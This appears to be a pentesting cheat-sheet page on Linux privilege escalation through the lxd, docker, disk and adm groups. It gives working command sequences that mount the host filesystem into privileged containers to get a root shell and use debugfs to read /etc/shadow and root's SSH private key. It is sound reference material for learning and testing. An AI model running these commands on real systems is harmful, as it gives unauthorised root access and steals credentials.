Privileged Groups

LXC/LXD

Reference: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

  1. Check group membership

    $ id

uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)

  2. Unzip alpine image

    $ unzip alpine.zip

  3. Start LXD initialization process. Consult this post for more information on each step.

    $ lxd init

  4. Import the local image

    $ lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine

  5. Start a privilieged container

    $ lxc init alpine r00t -c security.privileged=true

  6. Mount the host file system

    $ lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

  7. Spawn a shell inside the container instance as root

    $ lxc start r00t
$ lxc exec r00t /bin/sh

Docker

  1. Placing a user in the docker group is essentially equivalent to root access

  2. We can spawn new containers on the /root directory to read files or ssh keys

    $ docker run -v /root:/mnt -it ubuntu
$ # or use /etc to retrieve /etc/shadow
$ docker run -v /etc:/mnt -it ubuntu

Disk

Users within the disk group has access to any devices contained in /dev

  1. Access /dev/sda1 which is used as the main device used by the OS

    $ df -h #Find where "/" is mounted
$ debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow

  2. Or write files

    $ debugfs -w /dev/sda1
debugfs:  dump /tmp/asd1.txt /tmp/asd2.txt

ADM

Users within this group can access all logs stored in /var/log but this can be used to gather sensitive data stored in log files or enumerate user actions and running cron jobs.

PreviousSudo Rights AbuseNextCapabilities

Last updated